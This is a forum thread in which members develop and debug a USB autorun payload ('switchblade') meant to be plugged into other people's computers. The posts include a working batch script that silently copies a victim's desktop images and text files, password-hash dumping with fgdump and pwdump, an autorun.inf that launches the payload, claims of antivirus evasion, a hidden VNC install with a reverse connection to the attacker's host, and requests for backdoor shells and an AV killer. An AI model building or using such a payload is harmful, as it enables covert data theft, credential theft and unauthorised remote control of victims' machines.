Jump to content

~Gozor~ Finished Payload


setzer1411

Recommended Posts

  • Replies 220
  • Created
  • Last Reply

Top Posters In This Topic

I use the trendmicro internet security for av,,, It caught the fgdump,, and the cachedump as well ,, It gave the info, But the big red Flag that popped up would kinda freak out someone!!! If they used the same av........ Do other av's catch these things or is it just me???

Link to comment
Share on other sites

-----------------------------

Ill apologise now to all those people who I have not had time to answer your questions, I have been really busy recently. I will try to release V2.0 tomorrow if time permits. If I have missed your question I'm sorry and please pm me, you may not be the only person who wants to know.

-----------------------------

Hey Gonzor,

    Just wanna report in some personal bug feedback. 

I am getting this message:

======================

Windows - No Disk                          X

======================

X    There is no disk in the drive.

      Please insert a disk into drive.

|Cancel|  |Try Again|  |Continue|

And it is the cmd. exe process that is running during this error.  This also occurs when Netpass runs (even when netpass is disabled [WTF?])

Otherwise, the rest of the payload works like a charm.  Hacksaw works perfectly - just as long as I log in and stuff like you said.  Keep up the good work!

This has been annoying me quite a bit, from what we can tell the error is caused by having a card reader. I don't have a card reader so I have never experienced this error first hand and there have been several parts of the story that vary for each person so it is very difficult to figure out EXACTLY what is causing this error. It shouldn't have anything to do with netpass since it happens when it is disabled (unless you are saying netpass runs even when it is meant to be disabled). The HakSaw should actually work now without having to wait until the next time you log on, let me know if it isn't because it works for me so I will have to test that.

Thanks alot GonZor, makes much more sense now. Appreciate you takin the time to explain each step individually :grin:

No problem, just giving back what I can.

Just thought I would say the problem seems to be "%Documents and Settings%" variable. By changing it to C:Documents and Settings everything works fine this goes for file.exe. Also tried xcopy same issue. Anyone else had this problem?

I feel so stupid, This is why we should learn to read properly... [me=GonZor]slaps self[/me]

There is no "%Documents and Settings%" variable, assuming your <source> now looks like this

"C:Documents and Settings%username%My Documents*.jpg"

The "%homepath%" variable will expand to what you want. hence the <source> could be rewritten as this which is better in case they have windows installed on another partition.

"%homepath%My Documents*.jpg"

I use the trendmicro internet security for av,,, It caught the fgdump,, and the cachedump as well ,, It gave the info, But the big red Flag that popped up would kinda freak out someone!!! If they used the same av........ Do other av's catch these things or is it just me???

Unfortunately some of the tools are detected by certain AV, I was unaware of trend micro detecting fgdump and cachedump. Its odd that it allowed those tool to dump the information, you should look at your AV settings and change them to deny access for these programs.

-----------------------------

Are you Mark Frederickson? If so please pm me asap.

-----------------------------

Link to comment
Share on other sites

@ GonZor,

LOL! Gotcha, I coulda swore I saw someone using that as a variable before, but I'm probably wrong, but yea that was my main purpose for wanting to use that variable "in case they had windows installed on another partition". So once again thanks I will mess around with this tonight:)

Perhaps you might be able to provide a link you recommend to help me understand/learn Batch Scripting, windows variables and all that? You seem to be pretty proficient. I looked around found quite a few good sites and tried to find something like a VTC course or CBT but was unsuccessful.

Link to comment
Share on other sites

@ GonZor,

Okay I finally somehow got it working all except the copy process I think I may be missing one small parameter or something:

@echo on

:: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED
FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
    :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC
    IF EXIST %%i:SystemSRCdrv.dat (
        SET fd=%%i:SystemSRC
            )
        )

:: CREATE PIC DIRECTORY
IF NOT EXIST %fd%Documents%computername%Pictures mkdir %fd%Documents%computername%Pictures

:: CREATE TXT DIRECTORY
IF NOT EXIST %fd%Documents%computername%txt's mkdir %fd%Documents%computername%txt's

file.exe /A:C "%homepath%%username%Desktop*.jpg" "%fd%Documents%computername%Pictures" /I /P

file.exe /A:C "%homepath%%username%Desktop*.bmp" "%fd%Documents%computername%Pictures" /I /P

file.exe /A:C "%homepath%%username%Desktop*.gif" "%fd%Documents%computername%Pictures" /I /P

file.exe /A:C "%homepath%%username%Desktop*.txt" "%fd%Documents%computername%txt's" /I /P

xcopy "%homepath%%username%Desktop*.txt" "%fd%Documents%computername%txt's" /s /c /q /r /h /y

exit

The biggest problem I was having was it could not find the flash partition but now it finally does and writes the directories, althought I had to put the pic directory code all on one line for some reason to get it working. Now the only problem is it doesn't execute any of the copy procedure. File.exe or xcopy. That is the only reason why xcopy is there now just to see if either would work. I turned echo on and in cmd accessed the cdfs partition of the drive and executed my autorun.bat which in turn executed the above code drv.bat but after it finds the drive it closes the cmd window. Is there any way I can execute this keeping the window open so I can see my error's or what I'm doing wrong? That's how I found out about the directory it stayed open for that part as I had then commented out the copy process and told me the syntax was invalid.

Now if possible I'd like to find out how I can see where it stops and why it stops at that point. I know your busy and if you have time to help me out great, if not that's cool you have helped me greatly already :D

Thanks in advance.

Link to comment
Share on other sites

I'm glad I can help, I'm surprised what I write actually makes sense to someone other than me.

-------------------

If you open up a cmd and type "set" this will display a list of variables set on yopur machine, a lot of them will be windows variables, but some may be specific to your machine. The windows variables are the ones that become useful when doing something like this. After you take a quick look at this list you will notice two things wrong with the following line.

file.exe /A:C "%homepath%%username%Desktop*.jpg" "%fd%Documents%computername%Pictures" /I /P

Firstly I gave you the wrong variable  :-(

The %homepath% variable expands to Documents and Settings%username% you will notice that this doesn't have a drive letter so it will only work if run from the partition where windows is installed. If we were to use the %homepath% variable we would need to use the %homedrive% variable before it, like so %homedrive%%homepath%. When expanded this would look something like this C:Documents and Settings%username%, when look at the variable list you may have noticed the %userprofile% variable which would expand to the same as %homedrive%%homepath%, so we should have been using the %userprofile% variable, sorry about that.

Secondly, I'm sure you have already figured this one out after reading that, the %homepath% variable (like the %userprofile% variable) expands to Documents and Settings%username% therefore when used like you have "%homepath%%username%" it will expand to Documents and Settings%username%%username% and as you can see wouldn't work.

The solution, replace the %homepath% variable with the %userprofile% variable and take out the %username% variable. Each line should now look something like this.

file.exe /A:C "%userprofile%Desktop*.jpg" "%fd%Documents%computername%Pictures" /I /P

Is there any way I can execute this keeping the window open so I can see my error's or what I'm doing wrong?

My suggestion is to use SciTE (Scintilla Text Editor), It has syntax highlighting and also has a window to view the output of the code (that does not disappear). If you want a screen shot to explain what I mean I will upload one later, but for now I'm off to wendys :P

Link to comment
Share on other sites

@ GonZor,

Thanks so much man. It's working perfectly now. Still a bit of a problem with file.exe but I think I can figure that out. The variables all make sense as well and I got that SciTE editor so hopefully that will help me out alot. Not sure if it's the proper way to give karma, but +1 :)

P.S. I found the proper way and gave you +1

Thanks again.

Link to comment
Share on other sites

I've actually got two problems.  One is the whole cmd. exe error with the Windows - No Disk error even though I don't have a card reader I still get the error.  As does the other computers I've tried. . I just reformatted to check again and it still gave the error. 

The other problem I get is with fgdump.  I can't get it to get the hashed on either of the two computers I tried.  both run Windows Home Edition.  Here is the result in the log:               

************************************

************[Dump SAM]**************

************************************

fgDump 1. 6. 0 - fizzgig and the mighty group at foofus. net

Written to make j0m0kun's life just a bit easier

Copyright© 2007 fizzgig and foofus. net

fgdump comes with ABSOLUTELY NO WARRANTY!

This is free software, and you are welcome to redistribute it

under certain conditions; see the COPYING and README files for

more information.

Starting dump on 127. 0. 0. 1

ERROR GetOSVersion: 53 - The network path was not found.

** Beginning local dump **

Unable to determine OS version, see previous error for details

CRITICAL: Error retrieving remote service information.  Remote registry may not be running, simple file sharing may be enabled, or the account may not have 'Log On as Batch Job' permission.  Skipping this host.

Error dumping server 127. 0. 0. 1, see previous messages for details

-----Summary-----

Failed servers:

127. 0. 0. 1

Successful servers:

NONE

Total failed: 1

Total successful: 0

-----Hashes-----

Any help would be greatly appreciated

Link to comment
Share on other sites

I just got back from a 10 day vacation in San Diego so I'm not that up to date, but I'm pretty sure GonZor is still going back to pwdump which had fewer/no problems.  Feel free to correct me if I'm wrong.  :P

I was stuck out there w/ only a crackberry to check hak5.  :(

Link to comment
Share on other sites

I take that back. I got PWDUMP working now for the new version. Hacksaw and VNC are enabled aswell. The SBconfig still works too. Only difference between this one and V2beta is it's pwdump instead of FGdump. though it's not encrypted I don't believe so AV might detect...Will need someone to scan. Link for PWDUMP version: http://files.filefront.com/V20Pwdumprar/;8...info.html    Upload it normal way through Universal Customizer. Also....It still didn't fix the cmd.exe error for me from Windows-Hard Disk or whatever..Someone see if they can get on that maybe?

Thanks, hope this helps

Link to comment
Share on other sites

So I think I half figured-out the Cmd.exe error. It looks like it's trying to access a drive that isn't there? I got the same error when typing C: in command prompt when my drive is really J:. So I think it's because the drive it's looking for doesn't exist maybe?

Link to comment
Share on other sites

Gozor,

  You have done a great job with the payload.  I was wondering if there is room for additions to the payload?  Do you have time to make these additions your self?  If not, could you point someone with little coding experience in the right direction for the modifications?  I would love to see the below included.

I was thinking of the following.

1.  Cryptcat ( hxxp: farm9. org/Cryptcat/ ) or netcat with stunnel.

Options to do the following, or enter your own syntax.

- Push a backdoor command shell

- Set up a netcar relay

- shovel shell to attacker

2.  AVKiller -

May be inappropriate now as many AV software detects this as a Trojan. 

3.  Option to input VNC password.

4.  Option to create a new user.

Link to comment
Share on other sites

  • 2 weeks later...

Hi everybody,

I'm a 15 year old hacker, new to the Hak. 5 forums and I've been experimenting with GonZor's switchblade.  (Nice work man!  :o)

Some users have reported the following bug:

----------------------------------------------------

Windows - No Disk                          X

X    There is no disk in the drive.

      Please insert a disk into drive.

|Cancel|  |Try Again|  |Continue|

-----------------------------------------------------

I'm sure that this code snippet is the cause:

-----------------------------------------------------

FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (

  IF EXIST %%i:SystemSRCdrv.  dat (

        SET fd=%%i:SystemSRC

        )

        )

-----------------------------------------------------

It's looping through all of the drive letters and it's trying to access existing drives,

while they are not accessible, which results in a 'no disk' error.

Since we dont want the bat file to output these errors, the go. bat file (and start. bat) should be configured to ignore errors.  .  .

This can also be done with executables.  (I'm working on one for myself if you don't mind GonZor :) They offer more possibilities)

In every case. . .  Does anyone know how to intercept all windows error messages in . bat files ?

It would be great to know :D

Thanks,

RedRaven ;)

Link to comment
Share on other sites

Finally out of beta:

The long awaited V2.0 is now out of beta, sorry for the delay.

Whats New:

  • [li]Restructured the payload and rewritten half the code (reduced size)[/li]

[li]Fixed VNC (confirmed working - new password is "easy")[/li]

[li]Added the option to use either FGDump or PWDump (or both)[/li]

[li]Rewritten the search function in VBS, hope fully fixed the "no disk error"[/li]

[li]Changed the way the files are named, now named as - "%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%][/li]

[li]Updated several parts so they are now undetected by most AV, to the best of my knowledge most AV's will only detect sbs.exe (part of the Hacksaw)[/li]

* Please note for VNC to work you must have the correct ports forwarded on the "vicitims" router and firewall and such...

I cant think of any other updates, Though I may have forgotten some. Also for those looking for a non-U3 version I have a temporary solution, follow the simple instructions below...

  • [li]
1. Extract the ISO to the root of your flash drive.[/li]

[li]2. Edit the AUTORUN.INF[/li]

[li]3. Run SBConfig from your flash drive.[/li]

* Please note the U3 menu system will not function on a non U3 drive but the payload will work fine (dont enable the U3 menu in SBConfig and you will be fine)

*If you don't Know how to make your own autorun.inf, use the following code

[autorun]
action=Enable USB Flash Drive
open=wscript go.vbs

As usual any feedback is welcome, please let me know if you are still encountering the no disk error. I have re written the search function in vbs and this should get rid of the problem but I may be wrong and have no way of testing. Thanks and once again sorry about the delays.

EDIT: As usual Linky In my Sig

Link to comment
Share on other sites

To avoid the "port forwarding issue" I modified my payload so the victim connects to my pc. So you only have to make a forwarding at your router which is very useful.

Quick'n dirty howto:

1. Get a dyndns account to provide the current ip adress
2. Write some code to let the vnc.exe connect to your static hostname
3. Get the vncviewer and run it in the listener mode

If you'd like I can provide the code.

Link to comment
Share on other sites

To avoid the "port forwarding issue" I modified my payload so the victim connects to my pc. So you only have to make a forwarding at your router which is very useful.

Quick'n dirty howto:

1. Get a dyndns account to provide the current ip adress
2. Write some code to let the vnc.exe connect to your static hostname
3. Get the vncviewer and run it in the listener mode

If you'd like I can provide the code.

Sounds Like a good Idea, I may incorporate this into the next release depending on the feedback.

Link to comment
Share on other sites

wow the noobs seem to betaking over teh boards :P

its getting waay too crowded for my liking  :(

I'm trying to improve GonZors switchblade by reporting bugs... And I'm not a noob because I don't have 700+ posts.

Anyway, I will stop beiing 'noobish' then..

Link to comment
Share on other sites

GonZor,

Nice job! The 'no disk' error is fixed!

One more problem: the PWDUMP.EXE is not responding. The logfile is stuck at size 3Kb. (I'm running on a Windows XP Pro. x64...)

Logging continues normally when I end PWDUMP.EXE in taskmanager.

Thats what I wanted to hear about the no disk error, for those of you interested I re wrote the drive search function in vbs because vbs is "smarter" and can detect what drives it needs to search where as with batch it was forcing a search even though the drive didn't exist.

I will look into the PWDump problem, I haven't had an issue but it sounds like a problem with PWDump running on your system. Could you try running PWDump manually and see if it will run properly.

wow the noobs seem to betaking over teh boards :P

its getting waay too crowded for my liking  :(

Who exactly are you referring to ? If you are referring to me, please elaborate or If you are referring to the people who are reporting bugs and such, simply go away I have asked them to. No one here claims to be a "1337 h4x0r", call me a noob if you like but your opinion means as much to me as a punch in the face (don't need it, don't want it).

EDIT - DLSS, before you start calling us noobs take a look at this. Not only do they consider themselves "1337" but "santa" also originally claimed my payload as his. I must be doing something right if people wish to take ownership of it.

Link to comment
Share on other sites

wow the noobs seem to betaking over teh boards :P

its getting waay too crowded for my liking  :(

Wow everyone was being productive in the thread besides you.  If you need to vent please don't spam GonZor's thread.  Most of this is bug reports, feature requests, and productive questions.  If you think you can do better, go work on your own switchblade.

Very impressive GonZor, eliminate all the bugs, make some improvements, rewrite a bunch of it.  Looking forward to your next release.  V 3.0 Alpha this time maybe?  :-P

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...